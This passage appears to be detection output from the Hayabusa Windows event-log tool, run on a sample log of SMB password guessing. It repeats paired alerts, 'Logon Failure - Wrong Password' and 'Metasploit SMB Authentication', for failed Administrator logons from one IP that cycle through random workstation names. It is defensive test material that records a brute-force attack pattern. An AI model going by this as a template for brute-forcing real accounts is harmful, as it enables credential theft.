Password,User: Administrator : Type: 3 : Workstation: xHXminAIeV4ZJIK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06YmUCHNZqbaZMdZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fYoENCtP2uPy9xNh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TRJRuXJTTH1afAfH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpnkzTlc3Uvj3hpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIuD8haFzR8P87rL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL1IreMAiE564NXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMUiCaMGBC46MnPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MOSWbwooyb60LExG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSDNF7s3vbtkZIOz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JBMk0qOV6237XtK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j41R1U1tYPvApCkZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcPkVZSeg5VwChW8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDLxt5gaFDTKsiVl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94JvBKdxJkawQQMT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KgBMk00K3iC1GQem : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XdGOj9Ybm6bcCo3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: by6F4YKorxhp5ahn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1G6ZOgOaV6luDQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qqSwNfvpPLQd6ZH1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: mxtJJj54xSzHibHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Y3yznfdaZ7dtwDO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esllFn4asbLxwkBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Pr0cgd6cF5ukhZ8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pS2fabTrbl6rZ1NB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkylDDmUyuT57HdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Aqs8rSvuLAQuhfDp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KI07KTgBJc4kBSKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Re3n3nJ8EEhRRT3G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BzspAC3z1csEn0Ve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: tpkb6bf42SLUst3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1F5d2wn60OgAExW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bhPNRHWhTyonDPuA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zEsnyWpUuHVBo6et : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I2FwaWy9TALkk9eU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fuikeQsxlOUVifVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZWdsRJp9fHypPI1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0j0IBX2eZnx99n9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YIZ5Knxg0xr0WmDb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wuej3f7mEoWmd4SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: B0LcCi06ilIhFPwb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWsCGgoFmH06rRf4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP47JjNKqtYIZPsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mNlWZ9o0xf7bl2d0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnPnB2lEN3BSDpXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVMyeF9jGuzHkTHg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sDKLl3PjW2qrzJGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
